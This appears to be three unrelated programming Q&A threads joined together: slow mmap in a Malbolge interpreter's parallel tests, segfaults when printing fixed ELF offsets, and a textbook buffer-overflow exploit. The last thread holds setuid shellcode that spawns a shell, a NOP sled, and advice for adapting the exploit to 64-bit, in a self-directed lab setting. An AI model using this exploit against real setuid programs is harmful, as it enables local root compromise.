We're currently facing a somewhat complex problem with mmap performance on our Linux server.
We use a server with 64-core AMD Opteron 6374 and 128GiB of RAM. Here, we created a qemu virtual machine with the same core count and 64GiB of RAM. We use it for unit-testing a program I wrote. There are around 60 unit tests that run in parallel, each of which allocates a little over 1GiB of RAM. Because the process memory compresses really well, we decided to enable Zram. During our tests, the memory usage dropped to around 300MiB for each process, which is a significant gain, at a relatively small performance loss (the swap area stays in physical memory).
Currently, our tests do not swap yet, but we have observed very poor mmap performance. In our testing, a single call to mmap could take up to 7 minutes (without swapping, of course), with memory being allocated at somewhere between 2 MB/s and 20 MB/s. Sometimes, though, all mmaps in all 60 processes are nearly instant and the processes allocate the required gigabyte of RAM right away. In the slow runs, we can watch them allocating tiny amounts of memory per second in real time.
The program I wrote follows:
// CC0, inspired by dzaima's code, which was inspired by my code.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <signal.h>
#include <unistd.h>
#define u8 uint8_t
#define i32 int32_t
#define u32 uint32_t
#define i64 int64_t
#define u64 uint64_t
#define C const
#define P static
#define _(a...) {return({a;});}
#define F_(n,a...) for(int i=0;i<n;i++){a;}
#define F1(n,x,a...) for(i32 i=0;i<n;i+=x){a;}
#define INLINE P inline __attribute__((always_inline))
#define assert(X) if(!(X))__builtin_unreachable();
#define LKL(c) __builtin_expect((c),1)
typedef u32 W;
#define SZ 19
#define END 1162261467ULL
P C u8 crz[]={1,0,0,9,1,0,2,9,2,2,1},crz2[]={4,3,3,1,0,0,1,0,0,9,9,9,9,9,9,9,4,3,5,1,0,2,1,0,2,9,9,9,9,9,9,9,5,5,4,2,2,1,2,2,1,9,9,9,9,9,9,9,4,3,3,1,0,0,7,6,6,9,9,9,9,9,9,9,4,3,5,1,0,2,7,6,8,9,9,9,9,9,9,9,5,5,4,2,2,1,8,8,7,9,9,9,9,9,9,9,7,6,6,7,6,6,4,3,3,9,9,9,9,9,9,9,7,6,8,7,6,8,4,3,5,9,9,9,9,9,9,9,8,8,7,8,8,7,5,5,4,9,9,9,9,9,9,9};
#define UNR_CRZ(trans,sf1,sf2)W am=a%sf1,ad=a/sf1,dm=d%sf1,dd=d/sf1;r+=k*trans[am+sf2*dm];a=ad;d=dd;k*=sf1;
INLINE W mcrz(W a, W d){W r=0,k=1;
#pragma GCC unroll 16
F_(SZ/2,UNR_CRZ(crz2,9,16))if(SZ&1){UNR_CRZ(crz,3,4)}return r;}
INLINE W mrot(W x)_(W t=END/3,b=x%t,m=b%3,d=b/3;d+m*(t/3)+(x-b))
P u64 pgsiz;
P W*mem,pat[6];
P void mpstb(void*b,u64 l){mmap(b,l,PROT_READ|PROT_WRITE,MAP_POPULATE|MAP_PRIVATE|MAP_ANON|MAP_FIXED,-1,0);}
P void sigsegvh(int n,siginfo_t*si,void*_) {
void*a=si->si_addr,*ab=(void*)((u64)a&~(pgsiz-1));mpstb(ab, pgsiz);
W* curr=ab;i64 off=(curr-mem)%(END/3);F1(pgsiz,sizeof(W),*curr++=pat[off++%6]);}
P u64 rup(u64 v)_(((v-1)&~(pgsiz-1))+pgsiz)
#define RDS 65536
__attribute__((hot,flatten))int main(int argc, char* argv[]){
pgsiz=sysconf(_SC_PAGESIZE);mem=mmap(NULL,END*sizeof(W),PROT_NONE,MAP_NORESERVE|MAP_PRIVATE|MAP_ANON,-1,0);
struct sigaction act;memset(&act,0,sizeof(struct sigaction));act.sa_flags=SA_SIGINFO;act.sa_sigaction=sigsegvh;sigaction(SIGSEGV,&act,NULL);
FILE*f=fopen(argv[1],"rb");fseek(f,0,SEEK_END);u64 S=ftell(f);rewind(f);u64 szR=rup(S),off=0;mpstb(mem, szR*sizeof(W));char data[RDS];
C W a1_off=94-((END-1)/6-29524)%94,a2_off=94-((END-1)/3-59048)%94;while(S){int am=LKL(S>RDS)?RDS:S;fread(&data,1,am,f);
#pragma GCC unroll 32
F_(am,W w=data[i];mem[off++]=w)S-=am;}for(;off<szR;off++)mem[off]=mcrz(mem[off-1],mem[off-2]);
W n2=mem[off-2],n1=mem[off-1];u64 off2=off;F_(6,W n0=mcrz(n1,n2);pat[off2%6]=n0;n2=n1;n1=n0;off2++)W c=0,a=0,*d=mem;
P C int offs[]={0,((i64)a1_off-(i64)(END/3))%94+94,((i64)a2_off-(i64)(2*(END/3))%94+94)};P C void*j[94];F_(94,j[i]=&&INS_DEF)
#define M(n) j[n]=&&INS_##n;
M(4)M(5)M(23)M(39)M(40)M(62)M(68)M(81)
#define BRA {goto*j[(c+mem[c]+offs[c/(END/3)])%94];}
BRA;
#define NXT mem[c] = \
"SOMEBODY MAKE ME FEEL ALIVE" \
"[hj9>,5z]&gqtyfr$(we4{WP)H-Zn,[%\\3dL+Q;>U!pJS72FhOA1CB6v^=I_0/8|jsb9m<.TVac`uY*MK'X~xDl}REokN:#?G\"i#" \
"AND SHATTER ME"[mem[c]];c++;d++;BRA
INS_4:c=*d;NXT;INS_5:putchar(a);fflush(stdout);NXT;
INS_23:;int CR=getchar();a=CR==EOF?END-1:CR;NXT;INS_39:a=*d=mrot(*d);NXT;INS_40:d=mem+*d;NXT;
INS_62:a=*d=mcrz(a, *d);INS_68:NXT;INS_81:return 0;INS_DEF:NXT;
}
It's an interpreter for the rotwidth=19 variant of Malbolge Unshackled (compiled with clang fast20.c -w -O3 -march=native -mtune=native -o fast20 -flto -mllvm -polly -fvisibility=hidden; clang -v yields Debian clang version 11.0.1-2). We feed it the source code of my project (passed as an argument to the program), temporarily available here (provided in the hope that our issue can be reproduced; use 7za to unpack).
Each time I want to run the unit tests, I execute the following shell script:
#!/bin/bash
# XXX: `rsync` is slower
echo "[+] sending test data."
cd kiera-tests && \
tar -czf - * | \
ssh kamila@remote \
"cd ~/malbolgelisp && rm -rf tests && mkdir tests && cd tests && tar -xzf -" && \
cd ..
echo "[+] building essential tools."
ssh kamila@remote "cd ~/malbolgelisp/tests && chmod a+x setup.sh && ./setup.sh"
echo "[+] sending malbolgelisp source code..."
tool/mb_nlib d < lisp.mb | \
pv | gzip -6 | \
ssh kamila@remote \
"gunzip | ~/malbolgelisp/tests/mb_nlib e > ~/malbolgelisp/lisp.mb && vmtouch -vt ~/malbolgelisp/lisp.mb"
echo "[+] running the tests..."
ssh kamila@remote "cd ~/malbolgelisp/tests/ && ./test.sh"
I vmtouch the ~300MB file, so it must have stayed in cache across the runs.
/home/kamila/malbolgelisp/lisp.mb
[OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO] 76711/76711
Files: 1
Directories: 0
Touched Pages: 76711 (299M)
Elapsed: 0.071541 seconds
As we've observed, the cached memory shown by bpytop grows up to 500MiB, which means that the file must have been cached. We also reupload the file each time and it changes significantly.
We tried using Valgrind on the interpreter, but it seems to misbehave under this condition for a yet unknown reason. It's easy to deduce what is happening in the code, though:
pgsiz=sysconf(_SC_PAGESIZE);
mem=mmap(NULL,END*sizeof(W),PROT_NONE,MAP_NORESERVE|MAP_PRIVATE|MAP_ANON,-1,0);
First, the entire memory area is mapped.
FILE*f=fopen(argv[1],"rb");fseek(f,0,SEEK_END);u64 S=ftell(f);rewind(f);
u64 szR=rup(S),off=0;mpstb(mem, szR*sizeof(W));
Then I query the file size (~300MiB, times sizeof(W) = ~1.2GiB) and eagerly map this amount of memory using mpstb:
P void mpstb(void*b,u64 l){
mmap(b,l,PROT_READ|PROT_WRITE,MAP_POPULATE|MAP_PRIVATE|MAP_ANON|MAP_FIXED,-1,0);}
I considered using mprotect, but in the following parts of the code we execute mpstb fairly often, causing IPIs for TLB shootdowns.
The following bit of code can't be the bottleneck: aside from the I/O it performs (on a cached file with a relatively big buffer, RDS = 65536, so it should be fast), it is just a bunch of mathematical operations, which can't take 7 minutes in one run and a few seconds in another run with the same data:
C W a1_off=94-((END-1)/6-29524)%94,a2_off=94-((END-1)/3-59048)%94;
while(S){int am=LKL(S>RDS)?RDS:S;fread(&data,1,am,f);
#pragma GCC unroll 32
F_(am,W w=data[i];mem[off++]=w)S-=am;}
for(;off<szR;off++)mem[off]=mcrz(mem[off-1],mem[off-2]);
We've also noticed that in the following test runner which is executed on the server:
#!/bin/bash
for d in b*; do
for f in $d/*.in; do
echo "[+] $f"
(./fast20 ../lisp.mb $f < $f > $f.aout; diff ${f%%.*}.out $f.aout) &
# sleep 3s
done
for job in `jobs -p`; do
wait $job
done
done
Uncommenting the # sleep 3s line makes the allocations much faster, which suggests that the Linux kernel simply can't handle a dozen processes each mapping a gigabyte of memory concurrently. We've also seen messages like watchdog: BUG: soft lockup - CPU#34 stuck for 24s! pop up during our testing, which messed up our bpytop view. Some googling reveals that this is printed when a CPU is stuck in the kernel for too long, which is yet another indication that mmap in this example is ridiculously slow.
We also suspected that it might be caused by memory ballooning in qemu, but disabling it made very little difference.
Interestingly enough, all the processes seem to allocate memory slowly and concurrently.
The documentation for the Lisp interpreter is available here and it can be used to construct test cases, the simplest one being (+ 2 2).
My question follows: can we do something about this bug? Are we missing something? I know that running fewer processes at a time makes it bearable (the runtime drops from 30m to 5m), but if it weren't for the allocation performance, the tests could easily finish within 40 seconds, which would be a huge improvement. Is mmap inherently slow on Linux when called by multiple processes concurrently?
Finally, please let me know if we should provide any further details.
Using the objdump command, I figured out that address 0x02a8 contains the start of the path /lib64/ld-linux-x86-64.so.2, and that this path ends with a 0x00 byte, as C strings do.
So I tried to write a simple C program that will print this line (I used a sample from the book "RE for beginners" by Dennis Yurichev, page 24):
#include <stdio.h>
int main(){
printf(0x02a8);
return 0;
}
But I was disappointed to get a segmentation fault instead of the expected /lib64/ld-linux-x86-64.so.2 output.
I find it strange to use such a "fast" call of printf without specifiers or at least pointer cast, so I tried to make the code more natural:
#include <stdio.h>
int main(){
char *p = (char*)0x02a8;
printf(p);
printf("\n");
return 0;
}
And after running this I still got a segmentation fault.
I don't believe this is happening because of restricted memory areas, because in the book it all goes well at the 1st try. I am not sure, maybe there is something more that wasn't mentioned in that book.
So I need a clear explanation of why the segmentation fault happens every time I run the program.
I'm using the latest fully-upgraded Kali Linux release.
Disappointing to see that your "RE for beginners" book does not go into the basics first, and spits out this nonsense. Nonetheless, what you are doing is obviously wrong, let me explain why.
Normally on Linux, GCC produces ELF executables that are position independent. This is done for security purposes. When the program is run, the operating system is able to place it anywhere in memory (at any address), and the program will work just fine. This is what allows Address Space Layout Randomization to be applied to the executable itself; ASLR is a feature of the operating system that is nowadays enabled by default.
Normally, an ELF program would have a "base address", and would be loaded exactly at that address in order to work. However, in case of a position independent ELF, the "base address" is set to 0x0, and the operating system and the interpreter decide where to put the program at runtime.
When using objdump on a position independent executable, every address that you see is not a real address, but rather an offset from the base of the program (which will only be known at runtime). Therefore it is not possible to know the position of such a string (or any other variable) before runtime.
If you want the above to work, you will have to compile an ELF that is not position independent. You can do so like this:
gcc -no-pie -fno-pie prog.c -o prog
It no longer works like that. The 64-bit Linux executables that you're likely using are position-independent and they're loaded into memory at an arbitrary address. In that case the ELF file does not contain any fixed base address.
While you could make a position-dependent executable as instructed by Marco Bonelli, that is not how things work for arbitrary executables on modern 64-bit linuxen, so it is more worthwhile to learn to do this with position-independent ones, even though it is a bit trickier.
This worked for me to print ELF, i.e. the ELF header magic, and the interpreter string. It is dirty in that it probably only works for a small executable anyway.
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
int main(){
// convert main to uintptr_t
uintptr_t main_addr = (uintptr_t)main;
// clear bottom 12 bits so that it points to the beginning of page
main_addr &= ~0xFFFLLU;
// subtract one page so that we're in the elf headers...
main_addr -= 0x1000;
// elf magic
puts((char *)main_addr);
// interpreter string, offset from hexdump!
puts((char *)main_addr + 0x318);
}
There is another trick to find the beginning of the ELF executable in memory: the so-called auxiliary vector and getauxval:
The getauxval() function retrieves values from the auxiliary vector,
a mechanism that the kernel's ELF binary loader uses to pass certain
information to user space when a program is executed.
The location of the ELF program headers in memory will be
#include <sys/auxv.h>
char *program_headers = (char*)getauxval(AT_PHDR);
The actual ELF header is 64 bytes long, and the program headers typically start at byte 64, so if you subtract 64 from this you get a pointer to the magic string again. Our code can therefore be simplified to
#include <stdio.h>
#include <inttypes.h>
#include <sys/auxv.h>
int main(){
char *elf_header = (char *)getauxval(AT_PHDR) - 0x40;
puts(elf_header + 0x318); // or whatever the offset was in your executable
}
And finally, an executable that figures out the interpreter position from the ELF headers alone, provided that you've got a 64-bit ELF, magic numbers from Wikipedia...
#include <stdio.h>
#include <inttypes.h>
#include <sys/auxv.h>
int main() {
// get pointer to the first program header
char *ph = (char *)getauxval(AT_PHDR);
// elf header at this position
char *elfh = ph - 0x40;
// segment type 0x3 is the interpreter;
// program header item length 0x38 in 64-bit executables
while (*(uint32_t *)ph != 3) ph += 0x38;
// the offset (from the beginning of the executable) is a 64-bit
// field at 0x8 in the program header entry
uint64_t offset = *(uint64_t *)(ph + 0x8);
// print the interpreter path...
puts(elfh + offset);
}
I guess it segfaults because of the way you use printf: you don't use the format parameter the way it is designed to be used.
The first argument printf takes is a string that controls how the output is formatted: int printf(const char *fmt, ...), where the ... stands for the data you want to display according to the format string.
So if you want to print a string:
//format as text
printf("%s\n", pointer_to_beginning_of_string);
//
If this does not work (and it probably won't), it is because you are trying to read memory that you are not supposed to access.
Try adding the extra flags -Werror -Wextra -Wall -pedantic to your compiler invocation and show us the errors, please.
So, to start off with, I am on Kali 2020.1, fully updated. 64 bit.
The source code is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include "hacking.h"
#include <unistd.h>
#include <stdlib.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
long int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if(argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (long int) &i - offset; // Set return address.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
Now, some important clarifications. I included all those headers because compilation throws warnings without them.
The preceding notetaker and notesearch programs, as well as this exploit_notesearch program have been compiled as follows in the Terminal:
gcc -g -mpreferred-stack-boundary=4 -no-pie -fno-stack-protector -Wl,-z,norelro -z execstack -o exploit_notesearch exploit_notesearch.c
I no longer remember the source which said I must compile this way (the preferred stack boundary was 2 for them, but my machine requires it to be between 4 and 12). Also, the stack is executable now as you can see.
All 3 programs (notetaker, notesearch, and exploit_notesearch) had their permissions modified as in the book:
sudo chown root:root ./program_name
sudo chmod u+s ./program_name
I tried following the solution from this link: Debugging Buffer Overflow Example, but to no avail. The same goes for this link: Not So Fast Shellcode Exploit
Changing the offset incrementally from 0 to 330 by using increments of 1, 10, 20, and 30 in the terminal using a for-loop also did not solve my problem. I keep getting a segmentation fault no matter what I do.
What could be the issue in my case and what would be the best way to overcome said issue? Thank you.
P.S. I remember reading that I'm supposed to use 64-bit shellcode instead of the one provided.
When you are segfaulting, it is a great time to run the program within a debugger like GDB. It should tell you right where you are crashing, and you can step through the execution and validate the assumptions you are making. The most common segfaults tend to be invalid memory permissions (like trying to execute a non-executable page) or an invalid instruction (e.g., if you land in the middle of shellcode, not in a NOP sled).
You are running into a couple of issues trying to convert the exploit to work on 64-bit. When filling the buffer with return addresses, the code uses the constant 4 as the stride, but pointers on 64-bit are actually 8 bytes:
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
That could also present some issues when trying to exploit the strcpy bug, because those 64-bit addresses will contain NULL bytes (since the usable address space only uses 6 of the 8 bytes). Thus, if you have some premature NULL bytes before actually overwriting the return address on the stack, you won't actually copy enough data to leverage the overflow as intended.